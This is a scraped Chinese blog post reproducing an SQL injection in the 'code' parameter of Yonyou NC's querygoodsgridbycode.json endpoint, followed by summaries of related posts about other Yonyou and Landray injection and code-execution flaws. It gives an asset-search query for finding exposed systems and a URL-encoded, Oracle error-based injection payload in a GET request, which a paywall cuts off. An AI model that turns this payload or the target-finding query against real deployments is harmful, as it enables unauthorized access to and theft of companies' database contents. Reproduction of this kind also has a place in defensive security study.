用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞

最新推荐文章于 2024-11-14 15:52:04 发布
最新推荐文章于 2024-11-14 15:52:04 发布
阅读量371 收藏
点赞数
分类专栏: 漏洞复现 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/140660673
版权

一、漏洞简介

用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、资产测绘

  • app.name==“用友 UAP”
  • 特征
    在这里插入图片描述

三、漏洞复现

GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%
了解本专栏 订阅专栏 解锁全文 超级会员免费看
xiaokp7
关注
专栏目录
订阅专栏
用友 NC showcontent SQL注入漏洞复现
0xSec
04-20 692
用友NC /ebvp/infopub/showcontent 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
【复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 836
【复现】用友u8CRM 文件读取漏洞用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
用友NCCloud系统runScript存在SQL注入漏洞
qq_36334672的博客
04-02 457
用友NC Cloud系统中的runScript接口被发现存在SQL注入SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息。
用友NC mobilereport接口存在SQL注入漏洞
weixin_43167326的博客
04-03 490
用友NC系统是一款全面的企业管理软件,涵盖财务、人力资源、供应链等多个领域,助力企业实现信息化管理和业务优化。此系统接口存在SQL注入漏洞
0day 新接口用友NC Cloud objquery SQL注入漏洞 (未公开)
weixin_43167326的博客
07-04 866
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修复了一个存在用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
蓝凌OA 文件Copy导致远程代码执行漏洞复现(XVE-2023-18344)
0xSec
07-18 1787
​由于蓝凌OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。
用友NC系统querygoodsgridbycode接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-24 394
用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
漏洞复现】用友 NC PaWfm SQL注入漏洞
qq_67810151的博客
04-13 390
用友NC 存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
0day漏洞含POC-用友NC base64接口存在SQL注入漏洞
weixin_43167326的博客
03-18 1015
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC base64接口存在SQL注入漏洞
漏洞复现】用友-NC-Cloud-runScript-sql注入
知黑而守白
03-19 221
​​​​NC Cloud是用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。NC Cloud完全基于云原生架构,技术先进、性能稳定、自主安全可控,支撑大中型以及超大型集团企业N层多site混合云部署方案,支持整个系统高可用、弹性扩展、双/多活,以及快速灾备恢复能力等。用友NC Cloud系统 runScript 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
【HW必备】用友NC-Cloud存在17处漏洞合集
wananxuexihu的博客
06-24 1794
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
sql注入之二次注入(sqlilabs-less24)
CSDNRomance的博客
11-13 395
二阶注入相对隐蔽,因为其恶意代码不会在第一步直接执行,所以在开发和测试时,务必要考虑输入数据在不同阶段的调用方式,以避免此类攻击。
SQL,力扣题目1107,每日新用户统计
m0_59659684的博客
11-13 272
activity 列是 ENUM 类型,可能取 ('login', 'logout', 'jobs', 'groups', 'homepage') 几个值之一。编写解决方案,找出从今天起最多 90 天内,每个日期该日期首次登录的用户数。2、思路:找出每个用户第一天登录的日期之后再进行过滤90天以内的日期。2、找出第一天登录日期与指定日期间隔90天以内的日期,并计算人数。1、CTE表达式 + 窗口函数 + datediff()1、找出用户第一天登录的日期。该表可能有重复的行。
PostgreSQL 创建相同结构的表
云端的博客
11-11 1009
PostgreSQL 创建相同结构的表
SQL面试题——奔驰SQL面试题 车辆在不同驾驶模式下的时间
11-12 568
我们上报上来的数据包含当前的驾驶模式和当前时间戳,我们可以把下次上报上来的时间减去当前时间的差作为这个驾驶模式的形式时间,很多人可能会说要不要判断下次上来的驾驶模式是不是和当前的相当呀。如果相等作为条件,SPORT 的驾驶时长就是TS3-TS1,如果没有这个条件SPORT 的驾驶时长就是TS4-TS1。那这个问题就很简单了,我们获取下一次上报的时间和当前时间做差,当成当前驾驶模式的形式时间。前面我们已经有了每种驾驶模式的驾驶时间,我们只需要按照驾驶时间排序即可。这两个放在一起的话,我们可以这样写。
PostgreSQL 事务读取行 不使用行锁 真的? 利弊双刃剑
sql server的专栏
11-11 984
开头还是介绍一下群,如果感兴趣PolarDB ,MongoDB ,MySQL ,PostgreSQL ,Redis, OceanBase, Sql Server等有问题,有需求都可以加群群内有各大数据库行业大咖,可以解决你的问题。加群请联系 liuaustin3 ,(共2580人左右 1 + 2 + 3 + 4 +5 + 6 + 7+8) 新人进7群,开8群)最近一个同学问我一个问题,这也是练习题...
121、SQL Server取开始时间、截止时间
最新发布
m0_57310426的博客
11-14 101
SELECT dateadd(ms,-3,DATEADD(mm, DATEDIFF(m,0,getdate())+1, 0)) 当月最后一天。SELECT dateadd(ms,-3,DATEADD(dd, DATEDIFF(dd,-1,getdate()), 0)) 当天结束。SELECT DATEADD(mm, DATEDIFF(mm,0,getdate()), 0) 当月第一天。dd,0,getdate()), 0)) 当天开始。
macOS系统下使用SQLark连接达梦数据库
ea8d1n3的博客
11-14 344
本文将简单介绍如何下载安装SQLark并连接达梦数据库
用友NC总账系统详解:控制参数接口与财务管理
"该资源是关于用友NC总账系统的财务基础培训资料,涵盖了总账、固定资产、实务操作等多个方面,强调了UAP平台在系统中的核心作用以及与其他模块的接口关系。" 在用友NC总账系统中,"可控制一些参数是否由下级增加...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值